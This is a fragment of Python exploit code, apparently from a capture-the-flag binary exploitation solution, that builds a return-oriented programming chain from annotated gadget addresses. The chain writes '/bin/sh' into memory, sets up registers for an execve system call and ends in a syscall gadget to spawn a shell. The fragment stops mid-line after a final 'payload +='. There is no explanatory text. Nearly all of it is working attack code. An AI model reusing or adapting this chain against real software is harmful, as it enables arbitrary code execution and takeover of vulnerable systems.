payload = p64(0x4021b5)
#0x00000000004021b5: pop rbx; pop rbp; ret; 
payload += p64(0x80)+p64(0x4131e8)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4021b5)
# 0x00000000004021b5: pop rbx; pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x4130ad)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4021b5)
# 0x00000000004021b5: pop rbx; pop rbp; ret; 
payload += p64(0x68662f)+p64(0x4130b1)+p64(0x40125c)
# 0x40125c: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x413070)+p64(0x403331)
# 0x0000000000403331: pop rsi; pop rbp; ret; 
payload += p64(0x36b12fc0)+p64(0x0)+p64(0x403329)
# 0x0000000000403329: mov eax, esi; add rsp, 0x20; pop rbx; pop r14; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x401553)
# 0x0000000000401553: add edx, dword ptr [rax - 0x366ffe15]; ret; 
payload += p64(0x403331)
# 0x0000000000403331: pop rsi; pop rbp; ret; 
payload += p64(0x3b)+p64(0x0)+p64(0x403329)
# 0x0000000000403329: mov eax, esi; add rsp, 0x20; pop rbx; pop r14; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x0)+p64(0x403331)
# 0x0000000000403331: pop rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x404b7b)
# 0x0000000000404b7b: syscall; 
payload +=
